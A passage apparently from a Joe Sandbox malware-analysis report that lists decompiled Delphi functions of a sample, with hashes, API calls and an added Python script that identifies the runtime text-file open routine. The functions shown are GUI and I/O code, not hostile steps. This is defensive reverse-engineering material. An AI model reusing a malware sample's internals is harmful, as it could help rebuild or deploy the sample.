      • String ID: StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text "%s"$StarBurn_CdvdBurnerGrabber_CreateEx() failed, exception %d, status %d, text "%s"$StarBurn_CdvdBurnerGrabber_GetDiscFreeSpace() failed, exception %d"$StarBurn_CdvdBurnerGrabber_GetDiscUsedSpace() failed, exception %d, status %d, text "%s"
      • API String ID: 3564614495-1107877878
      • Opcode ID: 23b72e9c19ea2c3d3fc916a55a66ead6a3f51f599b61974f7a2f60ec4a970180
      • Instruction ID: 265146b734a54c9b6d9e56ebca5357c0f8eba9cffe2afc1905ca3030d266ebcb
      • Opcode Fuzzy Hash: 23b72e9c19ea2c3d3fc916a55a66ead6a3f51f599b61974f7a2f60ec4a970180
      • Instruction Fuzzy Hash: 248167B19042589FCB50DFA8CC81BDEB7F8AB0D304F4145AAE648E7341E774AA45CF69
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 76%
      			E0047261C(void* __eax, void* __ebx, char __ecx, int __edx, void* __edi, void* __esi) {
      				char _v8;
      				int _v12;
      				void* _v16;
      				intOrPtr _v20;
      				char _v24;
      				char _v28;
      				char _v32;
      				char _v36;
      				char _v40;
      				long _t53;
      				long _t68;
      				void* _t73;
      				intOrPtr _t77;
      				void* _t84;
      				intOrPtr _t92;
      				void* _t95;
      				long _t100;
      				long _t101;
      				int _t103;
      				void* _t107;
      
      				_v40 = 0;
      				_v36 = 0;
      				_v24 = 0;
      				_v8 = __ecx;
      				_t103 = __edx;
      				_t84 = __eax;
      				_push(_t107);
      				_push(0x47278b);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t107 + 0xffffffdc;
      				if(__edx < 0) {
      					L8:
      					_pop(_t92);
      					 *[fs:eax] = _t92;
      					_push(0x472792);
      					E00404A64( &_v40, 2);
      					return E00404A40( &_v24);
      				}
      				_t100 = SendMessageA(E0044B158( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
      				_v16 = _t100;
      				if(_t100 < 0) {
      					_t101 = SendMessageA(E0044B158( *((intOrPtr*)(_t84 + 0x10))), 0xbb, _t103 - 1, 0);
      					_v16 = _t101;
      					if(_t101 < 0) {
      						goto L8;
      					}
      					_t53 = SendMessageA(E0044B158( *((intOrPtr*)(_t84 + 0x10))), 0xc1, _v16, 0);
      					if(_t53 == 0) {
      						goto L8;
      					}
      					_v16 = _v16 + _t53;
      					_v20 = 0x4727a4;
      					L6:
      					_v12 = _v16;
      					SendMessageA(E0044B158( *((intOrPtr*)(_t84 + 0x10))), 0x437, 0,  &_v16);
      					_push( &_v24);
      					_v32 = _v8;
      					_v28 = 0xb;
      					_push( &_v32);
      					E00404C38( &_v36, _v20);
      					_pop(_t95);
      					E0040A164(_v36, 0, _t95);
      					_t68 = E00404F00(_v24);
      					SendMessageA(E0044B158( *((intOrPtr*)(_t84 + 0x10))), 0xc2, 0, _t68);
      					_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x10)))) + 0xd0))();
      					if(_t73 != E00404D00(_v24) + _v12) {
      						_t77 =  *0x48f5d4; // 0x466c60
      						E00406A3C(_t77, 0,  &_v40);
      						E0040CBEC(_v40, 1);
      						E004043D0();
      					}
      					goto L8;
      				}
      				_v20 = 0x47279c;
      				goto L6;
      			}

      0x00472627
      0x0047262a
      0x0047262d
      0x00472630
      0x00472633
      0x00472635
      0x00472639
      0x0047263a
      0x0047263f
      0x00472642
      0x00472647
      0x00472768
      0x0047276a
      0x0047276d
      0x00472770
      0x0047277d
      0x0047278a
      0x0047278a
      0x00472663
      0x00472665
      0x0047266a
      0x0047268d
      0x0047268f
      0x00472694
      0x00000000
      0x00000000
      0x004726ae
      0x004726b5
      0x00000000
      0x00000000
      0x004726bb
      0x004726c3
      0x004726c6
      0x004726c9
      0x004726e0
      0x004726e8
      0x004726ec
      0x004726ef
      0x004726f6
      0x004726fd
      0x00472707
      0x00472708
      0x00472710
      0x00472726
      0x00472730
      0x00472745
      0x0047274a
      0x0047274f
      0x0047275e
      0x00472763
      0x00472763
      0x00000000
      0x00472745
      0x00472671
      0x00000000

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend
      • String ID: %s$%s$TsA$`lF
      • API String ID: 3850602802-2232998534
      • Opcode ID: 80e501cdaa155126c5a42cdd37b0a9bc861f6f5d2c7376ef2480ad07d51763e2
      • Instruction ID: e9705ed051abbdcae2fe669036359d053de33943c29310b41a64220534562838
      • Opcode Fuzzy Hash: 80e501cdaa155126c5a42cdd37b0a9bc861f6f5d2c7376ef2480ad07d51763e2
      • Instruction Fuzzy Hash: 7E412E71A40304ABDB04EFA5C986A9EB7F8EF48704F50847AF914F7281D7799D04CB68
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 86%
      			E00435B98(struct HDC__* __eax, void* __edx, void* __ebp, void* __eflags) {
      				struct tagTEXTMETRICA _v112;
      				void* __ebx;
      				void* _t14;
      				char* _t18;
      				signed int _t19;
      				signed int _t21;
      				struct HDC__* _t27;
      				signed int _t28;
      				signed int _t30;
      				signed int _t31;
      				void* _t32;
      				struct HDC__* _t38;
      				struct tagTEXTMETRICA* _t40;
      
      				_t40 =  &_v112;
      				_t38 = __eax;
      				_push(0);
      				L00407658();
      				_t27 = __eax;
      				GetTextMetricsA(__eax, _t40);
      				_t14 = SelectObject(_t27, E00425B40( *((intOrPtr*)(_t38 + 0x68)), _t27, _t32));
      				GetTextMetricsA(_t27,  &(_v112.tmMaxCharWidth));
      				SelectObject(_t27, _t14);
      				_push(_t27);
      				_push(0);
      				L004078C0();
      				_t18 =  *0x48f73c; // 0x490ae0
      				if( *_t18 == 0) {
      					_t28 = _t40->tmHeight;
      					_t19 = _v112.tmHeight;
      					if(_t28 > _t19) {
      						_t28 = _t19;
      					}
      					_t21 = GetSystemMetrics(6) << 2;
      					if(_t28 < 0) {
      						_t28 = _t28 + 3;
      					}
      					_t30 = _t21 + (_t28 >> 2);
      				} else {
      					if( *((char*)(_t38 + 0x1a5)) == 0) {
      						_t31 = 6;
      					} else {
      						_t31 = 8;
      					}
      					_t30 = GetSystemMetrics(6) * _t31;
      				}
      				return E00444108(_t38, _v112 + _t30);
      			}

      0x00435b9b
      0x00435b9e
      0x00435ba0
      0x00435ba2
      0x00435ba7
      0x00435bab
      0x00435bba
      0x00435bc7
      0x00435bce
      0x00435bd3
      0x00435bd4
      0x00435bd6
      0x00435bdb
      0x00435be3
      0x00435c07
      0x00435c0a
      0x00435c10
      0x00435c12
      0x00435c12
      0x00435c1b
      0x00435c20
      0x00435c22
      0x00435c22
      0x00435c2a
      0x00435be5
      0x00435bec
      0x00435bf5
      0x00435bee
      0x00435bee
      0x00435bee
      0x00435c03
      0x00435c03
      0x00435c3f

      APIs
      • 73BEAC50.USER32(00000000), ref: 00435BA2
      • GetTextMetricsA.GDI32(00000000), ref: 00435BAB
        • Part of subcall function 00425B40: CreateFontIndirectA.GDI32(?), ref: 00425C7E
      • SelectObject.GDI32(00000000,00000000), ref: 00435BBA
      • GetTextMetricsA.GDI32(00000000,?), ref: 00435BC7
      • SelectObject.GDI32(00000000,00000000), ref: 00435BCE
      • 73BEB380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00435BD6
      • GetSystemMetrics.USER32 ref: 00435BFC
      • GetSystemMetrics.USER32 ref: 00435C16
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
      • String ID: I
      • API String ID: 3751190600-299795746
      • Opcode ID: 65fddf76fe1d530042e72f51a6e4043cd0982eb9141ee8f03b627142d75ec0ea
      • Instruction ID: 8bcf32d755c3cae5c9eeffff763e8598d868f39fad12eae2dc07d2a72970266d
      • Opcode Fuzzy Hash: 65fddf76fe1d530042e72f51a6e4043cd0982eb9141ee8f03b627142d75ec0ea
      • Instruction Fuzzy Hash: CA115661B087406BE310767ACCC2B6B66C89B59398F44293AB646DB3D2D56DAC40836A
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00448F3C(void* __eax, struct HDC__* __ecx, struct HDC__* __edx) {
      				struct tagRECT _v44;
      				struct tagRECT _v60;
      				void* _v68;
      				int _v80;
      				int _t79;
      				struct HDC__* _t134;
      				int _t135;
      				void* _t136;
      				void* _t155;
      				void* _t156;
      				void* _t157;
      				struct HDC__* _t158;
      				intOrPtr* _t159;
      
      				_t137 = __ecx;
      				_t159 =  &(_v44.bottom);
      				_t134 = __ecx;
      				_t158 = __edx;
      				_t157 = __eax;
      				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *(__eax + 0x17c) != 0) {
      					_t137 =  *( *(__eax + 0x17c));
      					 *((intOrPtr*)( *( *(__eax + 0x17c)) + 0x20))();
      				}
      				_t78 =  *((intOrPtr*)(_t157 + 0x198));
      				if( *((intOrPtr*)(_t157 + 0x198)) == 0) {
      					L17:
      					_t79 =  *(_t157 + 0x19c);
      					if(_t79 == 0) {
      						L27:
      						return _t79;
      					}
      					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
      					if(_t79 < 0) {
      						goto L27;
      					}
      					_v44.right = _t79 + 1;
      					_t155 = 0;
      					do {
      						_t79 = E00419C84( *(_t157 + 0x19c), _t137, _t155);
      						_t135 = _t79;
      						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
      							_v44.left = CreateSolidBrush(E0042566C(0xff000010));
      							E00418618( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
      							FrameRect(_t158,  &_v44, _v44);
      							DeleteObject(_v60.right);
      							_v60.left = CreateSolidBrush(E0042566C(0xff000014));
      							_t137 =  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1;
      							E00418618( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
      							FrameRect(_t158,  &_v60, _v60);
      							_t79 = DeleteObject(_v68);
      						}
      						_t155 = _t155 + 1;
      						_t75 =  &(_v44.right);
      						 *_t75 = _v44.right - 1;
      					} while ( *_t75 != 0);
      					goto L27;
      				}
      				_t156 = 0;
      				if(_t134 != 0) {
      					_t156 = E00419CE8(_t78, _t134);
      					if(_t156 < 0) {
      						_t156 = 0;
      					}
      				}
      				 *_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x198)) + 8));
      				if(_t156 <  *_t159) {
      					do {
      						_t136 = E00419C84( *((intOrPtr*)(_t157 + 0x198)), _t137, _t156);
      						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
      							_t137 =  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48);
      							E00418618( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
      							if(RectVisible(_t158,  &(_v44.top)) != 0) {
      								if(( *(_t157 + 0x54) & 0x00000080) != 0) {
      									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
      								}
      								_v60.top = SaveDC(_t158);
      								E00443264(_t158,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
      								IntersectClipRect(_t158, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
      								_t137 = _t158;
      								E00445AE8(_t136, _t158, 0xf, 0);
      								RestoreDC(_t158, _v80);
      								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
      							}
      						}
      						_t156 = _t156 + 1;
      					} while (_t156 < _v60.top);
      				}
      			}

Statement addresses: 0x00448f3c to 0x0044916b

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
      • String ID:
      • API String ID: 375863564-0
      • Opcode ID: c30a44e101534416f7a52dd2c425f69f6a6f73ab6a18ccce055a0954abd5d48f
      • Instruction ID: ae47262fcc0b971a3cd609413da4aab9744b59915cfd7ccfc4be95d1a6c4d586
      • Opcode Fuzzy Hash: c30a44e101534416f7a52dd2c425f69f6a6f73ab6a18ccce055a0954abd5d48f
      • Instruction Fuzzy Hash: 5B517E712042409FEB54EF69C8C4B9B7BD8AF84308F04445EFE898B287DA39EC45CB59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 70%
      			E00403080(void** __eax) {
      				long _t29;
      				void* _t31;
      				long _t34;
      				void* _t38;
      				void* _t40;
      				long _t41;
      				int _t44;
      				void* _t46;
      				long _t54;
      				long _t55;
      				void* _t58;
      				void** _t59;
      				DWORD* _t60;
      
      				_t59 = __eax;
      				 *((intOrPtr*)(__eax + 0xc)) = 0;
      				 *((intOrPtr*)(__eax + 0x10)) = 0;
      				if(0xffffffffffff284f == 0) {
      					_t29 = 0x80000000;
      					_t55 = 1;
      					_t54 = 3;
      					 *((intOrPtr*)(__eax + 0x1c)) = 0x402fd4;
      				} else {
      					if(0xffffffffffff284f == 0) {
      						_t29 = 0x40000000;
      						_t55 = 1;
      						_t54 = 2;
      					} else {
      						if(0xffffffffffff284f != 0) {
      							return 0xffffffffffff284d;
      						}
      						_t29 = 0xc0000000;
      						_t55 = 1;
      						_t54 = 3;
      					}
      					_t59[7] = E00403014;
      				}
      				_t59[9] = E00403060;
      				_t59[8] = E00403010;
      				if(_t59[0x12] == 0) {
      					_t59[2] = 0x80;
      					_t59[9] = E00403010;
      					_t59[5] =  &(_t59[0x53]);
      					if(_t59[1] == 0xd7b2) {
      						if(_t59 != 0x4903e4) {
      							_push(0xfffffff5);
      						} else {
      							_push(0xfffffff4);
      						}
      					} else {
      						_push(0xfffffff6);
      					}
      					_t31 = GetStdHandle();
      					if(_t31 == 0xffffffff) {
      						goto L37;
      					}
      					 *_t59 = _t31;
      					goto L30;
      				} else {
      					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
      					if(_t38 == 0xffffffff) {
      						L37:
      						_t59[1] = 0xd7b0;
      						return GetLastError();
      					}
      					 *_t59 = _t38;
      					if(_t59[1] != 0xd7b3) {
      						L30:
      						if(_t59[1] == 0xd7b1) {
      							L34:
      							return 0;
      						}
      						_t34 = GetFileType( *_t59);
      						if(_t34 == 0) {
      							CloseHandle( *_t59);
      							_t59[1] = 0xd7b0;
      							return 0x69;
      						}
      						if(_t34 == 2) {
      							_t59[8] = E00403014;
      						}
      						goto L34;
      					}
      					_t59[1] = _t59[1] - 1;
      					_t40 = GetFileSize( *_t59, 0) + 1;
      					if(_t40 == 0) {
      						goto L37;
      					}
      					_t41 = _t40 - 0x81;
      					if(_t41 < 0) {
      						_t41 = 0;
      					}
      					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
      						goto L37;
      					} else {
      						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
      						_t58 = 0;
      						if(_t44 != 1) {
      							goto L37;
      						}
      						_t46 = 0;
      						while(_t46 < _t58) {
      							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
      								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
      									goto L37;
      								} else {
      									goto L30;
      								}
      							}
      							_t46 = _t46 + 1;
      						}
      						goto L30;
      					}
      				}
      			}

Statement addresses: 0x00403081 to 0x00403224

      APIs
      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00403108
      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040312C
      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00403148
      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00403169
      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403192
      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 004031A0
      • GetStdHandle.KERNEL32(000000F5), ref: 004031DB
      • GetFileType.KERNEL32(?,000000F5), ref: 004031F1
      • CloseHandle.KERNEL32(?,?,000000F5), ref: 0040320C
      • GetLastError.KERNEL32(000000F5), ref: 00403224
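E00403080 above reads like the Delphi System unit's text-file open routine rather than sample-specific logic: the mode constants 0xd7b0 to 0xd7b3 are Delphi's fmClosed, fmInput, fmOutput and fmInOut, GetStdHandle is called with -10, -11 or -12 (the comparison against the fixed record address 0x4903e4 selects the error handle for one global record) whenever the record carries no file name, and the 0x80-byte buffer at offset 0x14c together with the name at offset 0x48 match the 32-bit TTextRec layout published in System.pas. The script below is an added example, not code from the report or from the sample. It assumes that classic 32-bit TTextRec layout (an assumption; Unicode-era Delphi versions differ), maps each offset the decompiler emits through _t59 and __eax back to a field name, decodes the constants, and applies a triage check that flags the routine as runtime-library code so analysis time goes to the functions behind the detections in the summary instead.

```python
import re
from ctypes import Structure, c_int32, c_uint32, c_char, sizeof

# Classic 32-bit Delphi TTextRec (System.pas); assumed layout, see lead-in. Pointer
# fields are c_uint32 so the record stays 32-bit wide on a 64-bit host. The offsets
# are the ones the decompiled E00403080 dereferences through _t59 / __eax.
class TTextRec(Structure):
    _pack_ = 1
    _fields_ = [
        ("Handle",    c_int32),       # 0x000  *_t59
        ("Mode",      c_int32),       # 0x004  _t59[1]: fmClosed..fmInOut
        ("BufSize",   c_uint32),      # 0x008  _t59[2] = 0x80
        ("BufPos",    c_uint32),      # 0x00c  zeroed on open
        ("BufEnd",    c_uint32),      # 0x010  zeroed on open
        ("BufPtr",    c_uint32),      # 0x014  _t59[5] = &Buffer
        ("OpenFunc",  c_uint32),      # 0x018
        ("InOutFunc", c_uint32),      # 0x01c  _t59[7]
        ("FlushFunc", c_uint32),      # 0x020  _t59[8]
        ("CloseFunc", c_uint32),      # 0x024  _t59[9]
        ("UserData",  c_char * 32),   # 0x028
        ("Name",      c_char * 260),  # 0x048  _t59[0x12]; empty name => standard handle
        ("Buffer",    c_char * 128),  # 0x14c  _t59[0x53]
    ]

assert sizeof(TTextRec) == 0x1CC
FIELD_NAMES = {name for name, _ in TTextRec._fields_}

MODES = {0xD7B0: "fmClosed", 0xD7B1: "fmInput", 0xD7B2: "fmOutput", 0xD7B3: "fmInOut"}
STD_HANDLES = {0xFFFFFFF6: "STD_INPUT_HANDLE", 0xFFFFFFF5: "STD_OUTPUT_HANDLE",
               0xFFFFFFF4: "STD_ERROR_HANDLE"}

# Constructed input: statements copied from the E00403080 listing above.
DECOMPILED = [
    " *((intOrPtr*)(__eax + 0xc)) = 0;",
    " *((intOrPtr*)(__eax + 0x10)) = 0;",
    "_t59[9] = E00403060;",
    "if(_t59[0x12] == 0) {",
    "_t59[2] = 0x80;",
    "_t59[5] =  &(_t59[0x53]);",
    "if(_t59[1] == 0xd7b2) {",
    "_push(0xfffffff5);",
    "_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);",
    "_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);",
    "if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {",
]

INDEX_RE = re.compile(r"_t59\[(0x[0-9a-f]+|\d+)\]")
OFFSET_RE = re.compile(r"(?:__eax|_t59)(?:\s*\+\s*_t\d+)?\s*\+\s*(0x[0-9a-f]+)")
HANDLE_RE = re.compile(r"\*_t59\b")
CONST_RE = re.compile(r"\b(0xd7b[0-3]|0xfffffff[4-6])\b")


def field_at(offset):
    """Name the TTextRec field that contains byte `offset`, or None outside the record."""
    for name, _ in TTextRec._fields_:
        f = getattr(TTextRec, name)
        if f.offset <= offset < f.offset + f.size:
            return name
    return None


def annotate(line):
    """Explain every TTextRec access and Delphi/Win32 constant in one decompiled statement."""
    notes = []
    for m in INDEX_RE.finditer(line):            # _t59[N] indexes 4-byte slots
        idx = int(m.group(1), 16 if m.group(1).startswith("0x") else 10)
        notes.append("%s -> %s" % (m.group(0), field_at(idx * 4)))
    for m in OFFSET_RE.finditer(line):           # byte offsets off the record base
        notes.append("+%s -> %s" % (m.group(1), field_at(int(m.group(1), 16))))
    if HANDLE_RE.search(line):
        notes.append("*_t59 -> Handle")
    for m in CONST_RE.finditer(line):
        v = int(m.group(1), 16)
        notes.append("%s -> %s" % (m.group(1), MODES.get(v) or STD_HANDLES.get(v)))
    return notes


def is_delphi_text_open(lines):
    """Triage check: >= 4 distinct TTextRec fields touched and an fm* mode constant tested."""
    fields, saw_mode = set(), False
    for line in lines:
        for note in annotate(line):
            target = note.rsplit(" -> ", 1)[1]
            if target in MODES.values():
                saw_mode = True
            elif target in FIELD_NAMES:
                fields.add(target)
    return len(fields) >= 4 and saw_mode


if __name__ == "__main__":
    for stmt in DECOMPILED:
        print(stmt.strip(), "//", "; ".join(annotate(stmt)))
    print("Delphi System text-file open routine:", is_delphi_text_open(DECOMPILED))
```

The check deliberately needs both the field footprint and a mode constant: offsets alone collide with any record of similar size, and the 0xd7bX constants alone appear in every routine of the Text I/O family, so only the pair identifies the open routine.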
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
      • String ID:
      • API String ID: 1694776339-0
      • Opcode ID: 0d7655cd8fdcd372b9f8c58e5807966ea9927634d7e12d3c984bdbfdb65ce813
      • Instruction ID: 27ff012fa27621f5029f0865dd734609fec62d9dda047afaed24b99b334cb465
      • Opcode Fuzzy Hash: 0d7655cd8fdcd372b9f8c58e5807966ea9927634d7e12d3c984bdbfdb65ce813
      • Instruction Fuzzy Hash: B141F330100700AAF7305F258905B237EECEB44756F208A7FE4A6BA6E5D77EAE45874D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 62%
      			E00479AF4(intOrPtr* __eax) {
      				intOrPtr* _v8;
      				struct HDC__* _v12;
      				struct tagRECT _v28;
      				struct HDC__* _t36;
      				void* _t72;
      				void* _t77;
      				intOrPtr _t82;
      				intOrPtr _t85;
      				void* _t88;
      				void* _t90;
      				void* _t92;
      				intOrPtr _t93;
      
      				_t90 = _t92;
      				_t93 = _t92 + 0xffffffe8;
      				_v8 = __eax;
      				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
      					return E0044BFB0(_v8, _t82);
      				} else {
      					_push(0x13);
      					_push(0);
      					_t36 = E0044B158(_v8);
      					_push(_t36);
      					L00407660();
      					_v12 = _t36;
      					_push(_t90);
      					_push(0x479beb);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t93;
      					GetWindowRect(E0044B158(_v8),  &_v28);
      					E00406E24( &_v28,  ~(_v28.top),  ~(_v28.left));
      					ExcludeClipRect(_v12, _v28.left + 1, _v28.top + 1, _v28.right - 1, _v28.bottom - 1);
      					_t77 = CreatePen(1, 1, 0);
      					_t88 = SelectObject(_v12, _t77);
      					SetBkColor(_v12, E0042566C( *((intOrPtr*)(_v8 + 0x70))));
      					Rectangle(_v12, _v28, _v28.top, _v28.right, _v28.bottom);
      					if(_t88 != 0) {
      						SelectObject(_v12, _t88);
      					}
      					DeleteObject(_t77);
      					_pop(_t85);
      					 *[fs:eax] = _t85;
      					_push(0x479bfa);
      					_push(_v12);
      					_t72 = E0044B158(_v8);
      					_push(_t72);
      					L004078C0();
      					return _t72;
      				}
      			}

Statement addresses: 0x00479af5 to 0x00479bff

      APIs
      • 73BEACE0.USER32(00000000,00000000,00000013), ref: 00479B19
      • GetWindowRect.USER32 ref: 00479B3C
      • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,?,00000000,00479BEB,?,00000000,00000000,00000013), ref: 00479B6B
      • CreatePen.GDI32(00000001,00000001,00000000), ref: 00479B76
      • SelectObject.GDI32(?,00000000), ref: 00479B82
        • Part of subcall function 0042566C: GetSysColor.USER32(?), ref: 00425676
      • SetBkColor.GDI32(?,00000000), ref: 00479B99
      • Rectangle.GDI32(?,?,?,?,?), ref: 00479BB2
      • SelectObject.GDI32(?,00000000), ref: 00479BC0
      • DeleteObject.GDI32(00000000), ref: 00479BC6
      • 73BEB380.USER32(00000000,?,00479BFA,?,?,?,?,00000000,?,00000000,?,?,?,?,?,00000000), ref: 00479BE5
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$ColorRectSelect$B380ClipCreateDeleteExcludeRectangleWindow
      • String ID:
      • API String ID: 313503559-0
      • Opcode ID: ba9a215091066343acfeb8d73f99066d8c73f29612c598578114ee2c630a2ad2
      • Instruction ID: 18318c853ddd1ca6afb8db7ef43c3a5b5ecd8978ef1f410e9da75d199ca4b7e8
      • Opcode Fuzzy Hash: ba9a215091066343acfeb8d73f99066d8c73f29612c598578114ee2c630a2ad2
      • Instruction Fuzzy Hash: 7D31E275E04108AFDB50EBE9DC96EDEB7FCEB08704F504466B508F7281D678AE4087A5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0045FD04(intOrPtr _a4) {
      				intOrPtr _t27;
